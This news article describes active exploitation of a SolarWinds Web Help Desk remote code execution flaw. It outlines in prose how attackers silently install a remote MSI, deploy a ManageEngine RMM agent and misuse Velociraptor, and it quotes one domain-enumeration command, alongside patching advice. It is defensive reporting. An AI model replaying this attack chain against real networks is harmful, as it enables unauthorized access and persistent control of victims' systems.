Hackers Target SolarWinds Vulnerability to Deploy Tools

Hackers Target SolarWinds Vulnerability to Deploy Tools

Posted on By CWS

SolarWinds Web Help Desk Under Attack

A critical remote code execution (RCE) vulnerability in SolarWinds Web Help Desk is being actively exploited by malicious actors. These attacks involve the deployment of legitimate yet misused administrative tools, significantly increasing the risk to organizations using the affected software.

Observations by Huntress indicate that 84 endpoints across 78 organizations are particularly vulnerable. This highlights the widespread risk associated with the SolarWinds Web Help Desk platform.

Attack Methods and Tools Used

The attack sequence begins with the exploitation of the SolarWinds Web Help Desk service, where a compromised service wrapper initiates a Java process. This process executes a series of commands to silently install a remote MSI payload, leveraging the Catbox file-hosting service.

This payload launches a Zoho ManageEngine RMM agent, a tool that, despite its legitimate use, offers persistent, unattended access for attackers. The agent connects to an attacker-controlled account, providing immediate control.

Timeline and Techniques of the Cyber Attack

Once the remote management tool is active, attackers engage in reconnaissance activities to map domain-joined systems. This is achieved through commands such as ‘net group “domain computers” /do’, a precursor to targeted lateral movements within the network.

In rapid succession, attackers deploy Velociraptor, an open-source Digital Forensics and Incident Response (DFIR) platform, via another silent MSI installation. Although intended for defense, Velociraptor is exploited to execute commands and maintain control over compromised endpoints.

Security Measures and Recommendations

The campaign highlights the urgency for organizations to update their SolarWinds Web Help Desk installations to version 2026.1 or later, addressing specific vulnerabilities including CVE-2025-26399, CVE-2025-40536, and CVE-2025-40551.

Security protocols should include removing administrative interfaces from internet exposure, rotating credentials, and conducting thorough reviews for unauthorized tools and activities. Proactive measures are vital as exploitation efforts continue to escalate.

Stay informed on the latest cybersecurity developments by following our updates on Google News, LinkedIn, and X. For further information or to share your cybersecurity stories, contact us today.

Cyber Security News Tags:, , , , , , , , , , , , ,

Related Posts

Threat Actors Could Misuse Code Assistant To Inject Backdoors and Generating Harmful Content Threat Actors Could Misuse Code Assistant To Inject Backdoors and Generating Harmful Content Cyber Security News
OpenClaw AI Platform Exploited to Spread Malware OpenClaw AI Platform Exploited to Spread Malware Cyber Security News
Cisco Secure Firewall Snort 3 Detection Engine Vulnerability Enables DoS Attacks Cisco Secure Firewall Snort 3 Detection Engine Vulnerability Enables DoS Attacks Cyber Security News
Fortinet Confirms Critical FortiCloud SSO Vulnerability(CVE-2026-24858) Actively Exploited in the Wild Fortinet Confirms Critical FortiCloud SSO Vulnerability(CVE-2026-24858) Actively Exploited in the Wild Cyber Security News
Surveillance Company Using SS7 Bypass Attack to Track the User’s Location Information Surveillance Company Using SS7 Bypass Attack to Track the User’s Location Information Cyber Security News
Chinese Hackers Deploy NFC-enabled Android Malware to Steal Payment Data Chinese Hackers Deploy NFC-enabled Android Malware to Steal Payment Data Cyber Security News